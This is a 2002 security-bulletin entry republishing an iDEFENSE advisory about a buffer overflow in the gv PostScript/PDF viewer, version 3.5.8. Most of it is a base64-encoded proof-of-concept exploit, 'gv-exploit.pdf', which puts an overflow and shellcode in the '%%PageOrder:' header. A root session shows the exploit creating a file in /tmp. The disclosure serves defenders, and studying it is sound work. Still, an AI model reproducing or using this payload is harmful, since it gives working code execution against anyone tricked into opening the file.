27th Sep 2002 [SBWID-5714]
COMMAND
Exploitable Buffer Overflow in gv
SYSTEMS AFFECTED
This vulnerability affects the latest version of gv, 3.5.8. An exploit
has been tested on Red Hat Linux 7.3.
PROBLEM
An issue exclusively disclosed to iDEFENSE by zen-parse
[zen-parse@gmx.net], iDEFENSE Security Advisory [09.26.2002] :
--snipp--
In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix based email programs that
associate gv with email attachments. Since gv is not normally installed
setuid root, an attacker would only be able to cause arbitrary code to
run with the privileges of that user. Other programs that utilize
derivatives of gv, such as ggv or kghostview, may also be vulnerable in
similiar ways.
A proof of concept exploit for Red Hat Linux designed by zen-parse is
attached to this message. It packages the overflow and shellcode in the
"%%PageOrder:" section of the PDF.
[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
- -rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
[root@victim]#
--snapp--
--54265557
Content-Type: application/pdf; name="gv-exploit.pdf"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; filename="gv-exploit.pdf"
JSFQUy1BZG9iZS0zLjANCiUlQ3JlYXRvcjogZ3JvZmYgMS4xNiAod2l0aCBtb2RpZmljYXRpb25z
IGJ5IHplbi1wYXJzZSBieSBoYW5kIDEuMDBhKQ0KJSVDcmVhdGlvbkRhdGU6IFNhdCBKdW4gMTUg
MTU6MzBpc2gNCiUlUGFnZU9yZGVyOiBBQUFBQUFBQUFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFC
Q0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJD
REFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNE
QUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RB
QkNEYWFhYWJiYmJjY2NjZGRkZGVlZWVmZmZmZ2dnZ2hoaGhpaWlpampqamtra2tsbGxsbW1tbW5u
bm5vb29vcHBwcHFxcXFycnJyc3Nzc3R0dHR1dXV1dnZ2dnd3d3eg8v+/QEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAvPz//78xwGgv
L3NoaC9iaW6J41BoLy9zaGgvYmluieFQaC1wcGOJ5lBocmtlZGhpdHdvaHRtcC9oRlN9L2hoJHtJ
aHRvdWOJ4lBSVlFUWVBUWrAhSEhISEhISEhISEhISEhISEhISEhISM2ADQolJUVuZENvbW1lbnRz
DQolJUVPRg0K
--54265557--
SOLUTION
No patch, change viewer ?